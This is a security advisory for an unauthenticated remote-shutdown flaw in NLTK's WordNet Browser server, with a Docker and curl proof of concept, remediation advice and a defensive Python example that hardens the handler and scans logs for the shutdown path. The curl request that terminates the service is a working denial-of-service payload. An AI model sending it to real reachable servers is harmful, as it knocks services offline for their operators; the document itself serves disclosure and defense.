CVE-2026-33231
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Description
### Summary

`nltk.app.wordnet_app` allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. A simple `GET /SHUTDOWN%20THE%20SERVER` request causes the process to terminate immediately via `os._exit(0)`, resulting in a denial of service.

### Details

The vulnerable logic is in `nltk/app/wordnet_app.py`:

- [`nltk/app/wordnet_app.py:242`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L242) - The server listens on all interfaces:
  - `server = HTTPServer(("", port), MyServerHandler)`
- [`nltk/app/wordnet_app.py:87`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L87) - Incoming requests are checked for the exact path:
  - `if unquote_plus(sp) == "SHUTDOWN THE SERVER":`
- [`nltk/app/wordnet_app.py:88`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L88) - The shutdown protection only depends on `server_mode`
- [`nltk/app/wordnet_app.py:93`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L93) - In the default mode (`runBrowser=True`, therefore `server_mode=False`), the handler terminates the process directly:
  - `os._exit(0)`

This means any party that can reach the listening port can stop the service with a single unauthenticated GET request when the browser is started in its normal mode.

### PoC

1. Start the WordNet Browser in Docker in its default mode:

   ```bash
   docker run -d --name nltk-wordnet-web-default-retest -p 8004:8004 \
     nltk-sandbox \
     python -c "import nltk; nltk.download('wordnet', quiet=True); from nltk.app.wordnet_app import wnb; wnb(8004, True)"
   ```

2. Confirm the service is reachable:

   ```bash
   curl -s -o /tmp/wn_before.html -w '%{http_code}\n' 'http://127.0.0.1:8004/'
   ```

   Observed result:

   ```text
   200
   ```

3. Trigger shutdown:

   ```bash
   curl -s -o /tmp/wn_shutdown.html -w '%{http_code}\n' 'http://127.0.0.1:8004/SHUTDOWN%20THE%20SERVER'
   ```

   Observed result:

   ```text
   000
   ```

4. Verify the service is no longer available:

   ```bash
   curl -s -o /tmp/wn_after.html -w '%{http_code}\n' 'http://127.0.0.1:8004/'
   docker ps -a --filter name=nltk-wordnet-web-default-retest --format '{{.Names}}\t{{.Status}}'
   docker logs nltk-wordnet-web-default-retest
   ```

   Observed results:

   ```text
   000
   nltk-wordnet-web-default-retest    Exited (0)
   Server shutting down!
   ```

### Impact

This is an unauthenticated denial-of-service issue in the NLTK WordNet Browser HTTP server. Any reachable client can terminate the service remotely when the application is started in its default mode.

The impact is limited to service availability, but it is still security-relevant because:

- the route is accessible over HTTP
- no authentication or CSRF-style confirmation is required
- the server listens on all interfaces by default
- the process exits immediately instead of performing a controlled shutdown

This primarily affects users who run `nltk.app.wordnet_app` and expose or otherwise allow access to its listening port.
Analysis
The NLTK (Natural Language Toolkit) WordNet Browser HTTP server contains an unauthenticated shutdown vulnerability that allows any remote attacker to terminate the service with a single GET request to the '/SHUTDOWN THE SERVER' endpoint. This affects users running nltk.app.wordnet_app in its default mode, where the server binds to all network interfaces without authentication. …
Remediation
Within 24 hours: Identify all systems running nltk.app.wordnet_app and assess business criticality; disable or isolate the service if not essential. Within 7 days: Implement network segmentation to restrict access to the WordNet endpoint or deploy WAF rules blocking requests to '/SHUTDOWN THE SERVER'; monitor vendor communications for patch release. …
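The Details section above describes the decision that produces the outage (a path check through `unquote_plus`, then `os._exit(0)` whenever `server_mode` is false on a socket bound to all interfaces), and the Remediation section suggests blocking requests to that path until a patch is available. The following added example is not NLTK's code and not the reporter's PoC: it restates the described decision as a plain function, places an assumed hardened policy beside it (loopback-only binding, loopback-only shutdown, a controlled `HTTPServer.shutdown()` instead of `os._exit`), and runs the same decoded-path check over constructed access-log lines so the route can be spotted whichever encoding a client used. `described_decision`, `hardened_decision`, `bind_address`, `HardenedHandler`, `scan_access_log` and the log lines are this example's own assumptions.

```python
# Added example, not NLTK's code and not the advisory reporter's PoC. It restates
# the decision logic the advisory describes as plain functions, puts an assumed
# hardened policy beside it, and scans constructed access-log lines for the route.
import ipaddress
import re
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote_plus, urlparse

SHUTDOWN_COMMAND = "SHUTDOWN THE SERVER"  # the path the advisory quotes


def is_shutdown_request(raw_path: str) -> bool:
    """True when the percent-decoded request path equals the shutdown command.

    unquote_plus, which the advisory quotes, decodes '%20' and '+' alike, so a
    detector must decode before comparing rather than match one spelling. The
    leading-slash strip is this example's assumption about how the compared
    string is derived.
    """
    path = urlparse(raw_path).path.lstrip("/")
    return unquote_plus(path) == SHUTDOWN_COMMAND


def described_decision(raw_path: str, server_mode: bool) -> str:
    """The behaviour the advisory describes, returning a label instead of acting:
    any client that reaches the port can stop the process unless server_mode."""
    if not is_shutdown_request(raw_path):
        return "serve"
    if server_mode:
        return "refuse"
    return "os._exit"  # immediate process termination, no controlled shutdown


def hardened_decision(raw_path: str, server_mode: bool, client_ip: str) -> str:
    """Assumed hardened policy: shutdown is honoured only from a loopback peer,
    never in server mode, and then as a controlled stop rather than os._exit."""
    if not is_shutdown_request(raw_path):
        return "serve"
    if server_mode or not ipaddress.ip_address(client_ip).is_loopback:
        return "refuse"
    return "controlled_shutdown"


def bind_address(server_mode: bool) -> str:
    """Assumed fix for the listen address: the advisory notes the default binds
    '' (all interfaces); bind loopback unless server mode was requested."""
    return "" if server_mode else "127.0.0.1"


class HardenedHandler(BaseHTTPRequestHandler):
    """Minimal handler applying hardened_decision. A real fix would keep the
    WordNet pages and add a CSRF-style confirmation, which this example omits."""
    server_mode = False

    def do_GET(self):
        verdict = hardened_decision(self.path, self.server_mode, self.client_address[0])
        if verdict == "controlled_shutdown":
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"Server shutting down!\n")
            # shutdown() blocks until serve_forever() returns, so it must run on
            # another thread, never on the handler thread itself.
            threading.Thread(target=self.server.shutdown, daemon=True).start()
        elif verdict == "refuse":
            self.send_error(403, "shutdown not permitted from this client")
        else:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"ok\n")

    def log_message(self, fmt, *args):  # keep the demo quiet
        pass


# Constructed access-log lines (not real traffic) in common log format.
CONSTRUCTED_ACCESS_LOG = [
    '10.0.0.5 - - [01/Jan/2026:10:00:00 +0000] "GET / HTTP/1.1" 200 5123',
    '10.0.0.9 - - [01/Jan/2026:10:00:07 +0000] "GET /SHUTDOWN%20THE%20SERVER HTTP/1.1" - 0',
    '127.0.0.1 - - [01/Jan/2026:10:00:09 +0000] "GET /SHUTDOWN+THE+SERVER HTTP/1.1" 200 0',
    '10.0.0.9 - - [01/Jan/2026:10:00:12 +0000] "GET /wn?word=dog HTTP/1.1" 200 2048',
]
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*"')


def scan_access_log(lines):
    """Return (client_ip, raw_path) for each request whose path decodes to the
    shutdown command, whichever encoding the client used."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_shutdown_request(m.group("path")):
            hits.append((m.group("ip"), m.group("path")))
    return hits


if __name__ == "__main__":
    server = HTTPServer((bind_address(False), 0), HardenedHandler)
    print("hardened demo listening on", server.server_address)
    server.serve_forever()  # a loopback GET of the shutdown path stops it cleanly
```

The loopback checks address the network exposure the advisory describes (the `""` bind and the absence of authentication); they do not replace the CSRF-style confirmation the advisory also notes is missing, since a browser on the same host still originates from loopback. The log scanner is the same decode-then-compare test applied to traffic, which is what a WAF rule for this path needs to do as well: matching only the literal `%20` spelling would miss the `+` form that `unquote_plus` accepts.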
External POC / Exploit Code
GHSA-jm6w-m3j8-898g